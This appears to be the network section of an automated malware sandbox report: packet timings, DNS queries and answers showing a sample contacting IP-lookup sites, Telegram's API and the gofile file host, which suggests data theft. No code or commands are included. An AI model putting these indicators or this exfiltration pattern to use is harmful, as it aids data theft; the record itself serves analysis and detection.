                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.327744007 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.328511953 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.328524113 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.794348001 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.794456959 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.804744005 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.804754972 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.804961920 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.806706905 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:23.847335100 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.180860996 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.180874109 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.181858063 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.181862116 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.183410883 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.183423996 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.183821917 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.183834076 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.183976889 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.183984041 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184065104 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184070110 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184581995 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184587955 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184655905 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184663057 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184705019 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184711933 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184756041 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184762955 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184921980 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184930086 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184967041 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.184973955 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185097933 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185105085 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185201883 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185208082 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185259104 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185265064 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185316086 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185323000 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185399055 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185405970 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185456991 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185463905 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185513020 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185519934 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185791969 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185797930 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185838938 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185846090 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185898066 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185904980 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185939074 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.185945988 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186001062 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186007023 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186172009 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186178923 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186228037 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186233997 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186341047 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186347008 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186443090 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186450005 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186517000 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186522961 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186650991 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186657906 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186954975 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186961889 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187155962 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187161922 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187241077 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187268972 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.454416037 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.503104925 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.944731951 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945327044 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945477962 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945491076 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945527077 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945560932 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.330895901 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.450917959 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.451013088 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.451260090 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.571177959 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.589025974 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.589446068 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599325895 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599365950 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599437952 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599766016 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599781990 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.709825993 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.709894896 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.020018101 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.030040026 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.030071974 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.778763056 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.778784037 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.778842926 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.779129982 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.780411959 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288302898 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288367033 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288537979 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288945913 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288965940 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.767853975 CET870249730192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.767908096 CET497308702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.784823895 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.904815912 CET870249752192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.904906034 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.906322956 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.026252985 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.307580948 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.307648897 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.312499046 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.432405949 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.713689089 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.713754892 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.717897892 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.837894917 CET870249752192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.853667021 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.853761911 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.858969927 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.858999014 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.859267950 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.866274118 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.907344103 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.186168909 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.186647892 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.186688900 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.630398035 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.630853891 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.630917072 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.631304979 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:52.893276930 CET870249752192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:52.893352985 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:52.925317049 CET497548702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.046257973 CET870249754192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.046427965 CET497548702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.047889948 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.167767048 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.448875904 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.448959112 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.454797983 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.574708939 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.856147051 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.857531071 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.864980936 CET497548702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.985016108 CET870249754192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.019443989 CET870249754192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.021755934 CET497548702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.066207886 CET497928702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.186145067 CET870249792192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.189610958 CET497928702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.191031933 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.310926914 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.592215061 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.592308998 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.597872972 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.718127012 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.999650955 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:15.999747038 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:16.218462944 CET497928702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:16.338504076 CET870249792192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.144182920 CET870249792192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.144270897 CET497928702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.175625086 CET498438702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.295605898 CET870249843192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.297719955 CET498438702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.298873901 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.418802977 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.702651978 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.702732086 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.708468914 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:37.828403950 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:38.114833117 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:38.114926100 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:38.119750023 CET498438702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:38.239779949 CET870249843192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.269714117 CET870249843192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.269783974 CET498438702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.300642014 CET498948702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.420612097 CET870249894192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.420831919 CET498948702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.421812057 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.541743040 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.824068069 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.824194908 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.829591990 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:58:59.950021982 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:59:00.231179953 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:59:00.231281042 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:59:00.235938072 CET498948702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:59:00.355882883 CET870249894192.168.0.82192.168.2.4

                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:08.928064108 CET6174953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:09.925231934 CET6174953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.281949043 CET53617491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.281977892 CET53617491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.468602896 CET5218653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.646451950 CET53521861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.828788996 CET5345153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.969564915 CET53534511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.129440069 CET6280353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.271095037 CET53628031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:15.858227968 CET5359653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.111988068 CET53535961.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.564589024 CET5942553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.704359055 CET53594251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.091876030 CET5223753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.326733112 CET53522371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.173228979 CET5740053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.314591885 CET53574001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.793968916 CET5472753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET53547271.1.1.1192.168.2.4

                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:08.928064108 CET192.168.2.41.1.1.10xdc0cStandard query (0)ip-score.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:09.925231934 CET192.168.2.41.1.1.10xdc0cStandard query (0)ip-score.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.468602896 CET192.168.2.41.1.1.10x6484Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.828788996 CET192.168.2.41.1.1.10x765eStandard query (0)56.14.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.129440069 CET192.168.2.41.1.1.10xa3dbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:15.858227968 CET192.168.2.41.1.1.10x559Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.564589024 CET192.168.2.41.1.1.10x467dStandard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.091876030 CET192.168.2.41.1.1.10xa8cdStandard query (0)store6.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.173228979 CET192.168.2.41.1.1.10x8c93Standard query (0)56.14.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.793968916 CET192.168.2.41.1.1.10x7c73Standard query (0)szurubooru.zulipchat.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.281949043 CET1.1.1.1192.168.2.40xdc0cNo error (0)ip-score.com188.138.68.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.281977892 CET1.1.1.1192.168.2.40xdc0cNo error (0)ip-score.com188.138.68.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.646451950 CET1.1.1.1192.168.2.40x6484No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.646451950 CET1.1.1.1192.168.2.40x6484No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.646451950 CET1.1.1.1192.168.2.40x6484No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:10.646451950 CET1.1.1.1192.168.2.40x6484No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.969564915 CET1.1.1.1192.168.2.40x765eName error (3)56.14.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.271095037 CET1.1.1.1192.168.2.40xa3dbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.111988068 CET1.1.1.1192.168.2.40x559No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:16.111988068 CET1.1.1.1192.168.2.40x559No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:19.704359055 CET1.1.1.1192.168.2.40x467dNo error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:22.326733112 CET1.1.1.1192.168.2.40xa8cdNo error (0)store6.gofile.io31.14.70.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.314591885 CET1.1.1.1192.168.2.40x8c93Name error (3)56.14.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET1.1.1.1192.168.2.40x7c73No error (0)szurubooru.zulipchat.com50.17.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET1.1.1.1192.168.2.40x7c73No error (0)szurubooru.zulipchat.com3.210.246.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET1.1.1.1192.168.2.40x7c73No error (0)szurubooru.zulipchat.com44.208.10.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.286782026 CET1.1.1.1192.168.2.40x7c73No error (0)szurubooru.zulipchat.com54.198.104.147A (IP address)IN (0x0001)false
